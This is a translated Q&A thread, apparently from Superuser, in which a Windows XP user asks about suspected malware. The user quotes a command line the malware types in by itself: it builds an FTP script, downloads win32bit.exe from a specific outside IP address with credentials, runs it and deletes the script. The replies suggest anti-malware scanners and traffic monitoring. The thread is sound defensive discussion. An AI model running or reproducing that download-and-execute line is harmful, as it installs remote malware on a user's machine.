过去两天,我的电脑出现了奇怪的现象,我强烈怀疑是病毒。突然,一系列键盘事件开始出现。它试图打开命令提示符并尝试执行以下行:
del eq&echo open 186.81.185.135 14062 >> eq&echo user 12120 17227 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq
我正在运行的是 Win XP SP3,并且正在运行 McAfee。有人知道那是什么吗?
答案1
运行 Malwarebytes Anti-Malware。你可以得到它这里。您也许可以用它删除它。如果不能,那么格式化并重新加载是清理系统的最快、最简单的方法。此外,不时地重新加载可以让操作系统运行良好。希望这能有所帮助。
答案2
如果你的常规病毒扫描程序没有发现威胁(已知或未知),这并不意味着它不存在。威胁之火尝试一下,一个不依赖病毒签名而是依赖行为分析的反病毒程序
答案3
我推荐 Spybot Search & Destroy。
检查您的网络流量情况。您也许可以利用它来确定它是远程会话还是远程操作的木马。
您还可以根据读取字节数和写入字节数来监视任务管理器中正在运行的可执行文件。这就是我在系统中发现错误的方法。
答案4
如今,这个 IP 地址似乎是动态的,这对于它的用途来说似乎很奇怪。
$ dig -x 186.81.185.135
[..]
135.185.81.186.in-addr.arpa.86400 IN PTR 动态 IP-18681185135.cable.net.co.
[..]
然而,这事实上可能相当古老,那么您的病毒扫描程序确实正在运行……?
编辑: 昨天,正在搜索 186.81.185.135只给出了 1 个结果,今天给出了 2 个(加上这个超级用户问题本身)... 可能毕竟是最近的吗?